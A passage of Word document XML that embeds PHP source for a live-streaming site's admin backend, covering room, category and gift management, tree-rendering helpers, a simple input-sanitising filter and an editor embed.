        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',2=&gt;'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>正在直播</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="194F4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status_name'] = $status_data[$name['data']['status']];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10EF0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31B6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43BDD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57B23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C0488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04EB7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A03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7C0E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303E18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33A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CAE2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296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_del(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CB9EB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38EF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3F37B4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70452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this-&gt;token);;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BED80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b::name('member_zhibo')-&gt;cache(true)-&gt;find($id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4174D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json_decode($zhibo-&gt;DelRoom($name['roomId']),true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39FFB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zhibo')-&gt;delete($id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2114D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38C06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805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7F761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4031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9BAA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37CCE8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00DC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B0D99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D31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    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6534A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member_zhibo_type')-&gt;order('des desc,id asc')-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="314B9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get_tree_option($category,0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B922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category);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A9F1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F93B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C59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_add(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14F55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226F5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2524A7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0A3993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5DDDF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tid']==0){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26C0D1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lastRenderedPageBreak/>
        <w:t>$typename=Db::name('member_zhibo_type')-&gt;where(['title'=&gt;$post['title'],'tid'=&gt;0])-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E245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name){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63895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栏目名称已存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27380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212A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2673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_type')-&gt;insert($post);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CB21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769A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4A2FFD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E2D7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2039EF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9A4C2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70D80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_type')-&gt;where('id',$id)-&gt;update($post);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BA62C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0FF2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77532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C9E5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16AB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3D1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6FC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DD4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Db::name('member_zhibo_type')-&gt;field('id,tid,title')-&gt;order('des desc,id asc')-&gt;cache(true)-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EA755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get_tree_option($category,0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="549493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ategory',$category);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62E80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A009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zhibo_type')-&gt;where('id',$id)-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="034597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FDD6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0ADA3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16AD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2BCD5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3B1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389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4D87CB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9A4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19E4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04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_del(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BEB8D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6A3A2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1E8B23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AEE4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member_zhibo_type')-&gt;delete($id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03654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5F8C6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83732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88F5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732F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EAC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18A12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8FB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18F44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E98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wu(){    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="333EB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Db::name('member_zhibo_liwu')-&gt;order('des desc,id asc')-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08C17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1C17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75487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B343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wu_add(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33389D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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DF9D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15D281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input('post.');;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47C39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34FC38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name('member_zhibo_liwu')-&gt;where(['title'=&gt;$post['title']])-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B0AE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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B6238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名称已存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="021FB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4FB3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_liwu')-&gt;insert($post);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="041E23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3404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添加成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24119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6485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添加失败</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="186CC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089AB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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C8479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_liwu')-&gt;where('id',$id)-&gt;update($post);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61307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AA83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修改成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42088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B5BF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修改失败</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="721C6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C6A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51C9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29F7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2A1CF4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b::name('member_zhibo_liwu')-&gt;where('id',$id)-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33CF0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279E4C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name',$name);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EED5A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B02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6AEA4B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718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E66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fetch();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CCC4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4A3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F0258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FB8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wu_del(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07A45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gt;isAjax()){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="464F91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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="758E0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6598A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Db::name('member_zhibo_liwu')-&gt;delete($id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BF88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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>删除成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78687B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B5AEA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id</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>参数错误</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49EB1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C21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3669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提交参数错误</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70BA6D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B115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42F8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073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wu_list(){    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61ED9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736F1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name=input('param.name');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="090E9E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_type=input('param.type');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10E3C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arch_name &amp;&amp; $search_type){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E49AD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search_type]  = ['like','%'.$search_name.'%'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B89E7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4849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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E712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66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zhibo_liwu_list')-&gt;order('id desc')-&gt;where($map)-&gt;paginate('',false,['query'=&gt;request()-&gt;param()]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65AA42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gt;toarray()['data'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FC99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038DC8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 = _user($v['uid']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="715CA7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liwu'] = Db::name('member_zhibo_liwu')-&gt;find($v['liwu_id']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA4FD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969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data',$data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0950E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db-&gt;render();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F227C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page', $page);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69059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fetch();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1631A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6A71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39C69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288A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409EB5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2399E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gettree($data, $tid,$num=0){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="622F84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num+=1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53EA8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nbsp='';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67ECA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tid!=0){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CFBF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nbsp.=$nbsp.'&amp;nbsp;&amp;nbsp;</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>┠</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&amp;nbsp;&amp;nbsp';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6839F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122821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 = '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2898D0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ide=array('0'=&gt;'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>隐藏</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>','1'=&gt;'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>显示</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0974A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ides=array('1'=&gt;'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>隐藏</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>','0'=&gt;'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>显示</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A77E6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foreach($data as $k =&gt; $v){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44CF5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v['tid'] == $tid){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61A8A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 "\r\n&lt;tr id=\"id".$v['id']."\" class=\"gradeA footable-even category".$num."\"&gt;";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F702F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 class=\"categoryTitle\"&gt;".$nbsp.$v['id']."&lt;/td&gt;";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DE18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 class=\"categoryTitle\"&gt;".$nbsp.$v['title']."&lt;/td&gt;";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F03C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gt;".$v['controller']."&lt;/td&gt;";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E0BF0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gt;".$v['function']."&lt;/td&gt;";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B163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gt;".$hide[$v['hide']]."&lt;/td&gt;";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EC13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td&gt;&lt;div class="btn-group"&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7461F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button data-toggle="dropdown" class="btn btn-primary btn-xs dropdown-toggle"&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>操作</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;span class="caret"&gt;&lt;/span&gt;&lt;/button&gt;&lt;ul class="dropdown-menu"&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C829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li&gt;&lt;a href=".url('add',['id'=&gt;$v['id']])."&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>修改</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href=".url('hide',['id'=&gt;$v['id']])."&gt;".$hides[$v['hide']]."&lt;/a&gt;&lt;/li&gt;".'&lt;li class="divider"&gt;&lt;/li&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68245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lt;li&gt;&lt;a href=\"javascript:;\" onclick=\"del(".$v['id'].")\"&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>删除</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&lt;/a&gt;&lt;/li&gt;&lt;/td&gt;&lt;/tr&gt;";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54A4A7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 getTree($data, $v['id'],$num);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BBB9E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html;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77C96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0539A5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0F9061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return $html;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30FCE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0894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r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>字符过滤</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>url*/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EBB6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safe_replace($string) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="558CC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20','',$string);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="148F4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27','',$string);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="574BF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2527','',$string);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="188430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2251E0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amp;quot;',$string);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A0F0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6DFCCA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15E01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521F9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lt;','&amp;lt;',$string);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20D37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gt;','&amp;gt;',$string);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B1B0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078B7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0CE1C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str_replace('\\','',$string);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BE834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tring;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26444F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5B75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category($data, $tid,$selected,$num=0){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="051F6C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num+=1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21917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nbsp='';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65DB0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selecteds='';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E05A5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num!=1){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="599F2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for ($i=1; $i &lt;$num ; $i++) { </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="495CBB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nbsp.='&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="058310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100F0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nbsp.='</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>┠</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&amp;nbsp;&amp;nbsp;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CCA7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6F5FD3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 = '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A4EAF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foreach($data as $k =&gt; $v){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47A43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v['tid'] == $tid){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02FD8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selected==$v['id']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="532F97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selecteds='selected="selected"';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63E19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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="613DD9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selecteds='';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CD0D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1407F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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>"\r\n".'&lt;option value="'.$v['id'].'" '.$selecteds.'&gt;'.$nbsp.$v['title'].'&lt;/option&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10226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 category($data, $v['id'],$selected,$num);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13E5A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html </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>=$html;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C95B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45DC61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32958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return $html;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DA178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694D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function get_web_url() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37114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s_protocal = isset($_SERVER['SERVER_PORT']) &amp;&amp; $_SERVER['SERVER_PORT'] == '443' ? '' : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C69B6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hp_self = $_SERVER['PHP_SELF'] ? safe_replace($_SERVER['PHP_SELF']) : safe_replace($_SERVER['SCRIPT_NAME']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E853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_info = isset($_SERVER['PATH_INFO']) ? safe_replace($_SERVER['PATH_INFO']) : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07910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_url = isset($_SERVER['REQUEST_URI']) ? safe_replace($_SERVER['REQUEST_URI']) : $php_self.(isset($_SERVER['QUERY_STRING']) ? '?'.safe_replace($_SERVER['QUERY_STRING']) : $path_info);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61F1F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ys_protocal.(isset($_SERVER['HTTP_HOST']) ? $_SERVER['HTTP_HOST'] : '').$relate_url;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19D2F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BBEC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get_tree_option($data, $tid) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="605A2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ck = array($tid);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D7951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 = array();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="323B00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ed = array();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CA1D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tions = array();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D64C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bj = array();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="433931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op = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0436C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pth = -1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44057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data as $node) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20D42D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d = $node['tid'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06D14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child[$pid])) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26C7C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pid] = array();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A7DD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3FC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_push($child[$pid], $node['id']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EBF9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bj[$node['id']] = $node;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68253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298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ile (count($stack) &gt; 0) {    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F5D3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stack[0];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05EA9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false;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13FA3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de = isset($obj[$id]) ? $obj[$id] : null;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="017170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child[$id])) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77E4C6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i = count($child[$id]) - 1; $i &gt;= 0; $i--) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E8F5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_unshift($stack, $child[$id][$i]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B747C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D10D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true;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74F75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4FF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 $tid &amp;&amp; $node &amp;&amp; !isset($added[$id])) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="270EF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de['depth'] = $depth;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0320BD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tions[] = $node;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A005E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ed[$id] = true;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B318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5C0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lag == true){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24782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pth++;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="314494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F0DE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ode) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="442A0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 ($i = count($child[$node['tid']]) - 1; $i &gt;= 0; $i--) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BD1A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hild[$node['tid']][$i] == $id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55010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_splice($child[$node['tid']], $i, 1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="228488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16251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EEA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621E8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count($child[$node['tid']]) == 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD4D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node['tid']] = null;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="797E7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pth--;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02B0FD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0A87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FE0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_shift($stack);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="556E1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04A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op++;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C48F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oop &gt; 5000) return $options;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15F15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E84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child);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77196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obj);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25C280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options;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31C4A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0A13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ueditor($name=''){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22FE1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if(!$name){$name='content';}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08A94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lt;script type="text/javascript" charset="utf-8" src="__PLUGINS__ueditor/ueditor.config.js"&gt;&lt;/script&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="608FC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lt;script type="text/javascript" charset="utf-8" src="__PLUGINS__ueditor/ueditor.all.min.js"&gt;&lt;/script&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07076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lt;script type="text/javascript" src="__PLUGINS__ueditor/lang/zh-cn/zh-cn.js"&gt;&lt;/script&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42528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lt;script type="text/javascript"&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="741A4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_array($name))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FF8A1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name as $n) { $html.="var ue=UE.getEditor('".$n."');"; }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="704787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32440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var ue=UE.getEditor('".$name."');";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20BE4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html.='&lt;/script&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EF4F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return $html;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56174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6A728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payType($id,$name='title'){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65C333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pay')-&gt;where(['id'=&gt;$id])-&gt;cache(true)-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C94C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type'].$data['title'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A14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F9EB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7C3C5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validate;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C7864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71B8F2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in extends Validate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F433C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16F3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11A91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cy|</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
